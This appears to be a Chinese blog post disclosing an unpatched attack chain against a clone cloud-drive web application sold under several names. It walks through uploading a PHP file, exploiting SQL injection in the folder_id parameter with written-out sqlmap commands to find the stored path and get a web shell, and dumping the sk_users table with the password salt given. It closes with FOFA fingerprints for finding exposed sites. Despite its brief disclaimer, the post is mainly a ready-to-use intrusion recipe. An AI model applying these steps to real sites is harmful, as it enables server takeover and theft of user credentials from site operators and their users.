蓝奏云网盘（网盘蓝奏云搜索）

0x01 前言

首先 祝大家2024新年快乐 一路发发发 0day挖挖挖

最近比较忙 也很少发文章 有空了就给大家更新

注意：本文仅限于技术探讨，思路探讨，禁止进行未授权等违法操作

0x02 仿蓝奏网盘(城通)0day

这个网盘相信大家都很熟悉 经常逛源码站的朋友都知道

这套源码有很多个名字 （仿蓝奏云网盘、城通网盘、闪客网盘系统）

名字多蓝奏云网盘蓝奏云网盘，皮肤也多，但是漏洞基本通用

0x03 话不多说直接开始

前台注册个账号-登录

0x04 上传

直接上传一个php文件

0x05 注入点 组合拳

思路：

通过SQL注入拿到绝对路径 拼接GetShell经过审计 folder_id 存在注入

注入点：

sqlmap.py -r 1.txt -p folder_id --dbs   登录后带上cookie注入

0x06 爆破路径

刚刚上面登陆后上传的php 是没有直接返回路径的 得通过 SQL注入 去数据库查看返回路径

origin_name是我们上传文件的名字
file_name 是 文件在服务器的路径

0x07 Getshell✅

把路径和域名拼凑 成功Getshell

0x08 限制条件getshell⭕️

思路：

如果后台做了策略 无法前台上传php文件的

可以通过注入进后台开启php上传即可

sqlmap.py -r 1.txt -p folder_id -D 库名 -T sk_users --dump 

密码是加了盐的 通过拼接盐解密 MD5:tbg-sk-pan-ver-1-1-0

0x09 FOFA指纹

 "assets/picture/header-mobile.png"
 "/assets/static/index/css/share-style.css"

0x10 源码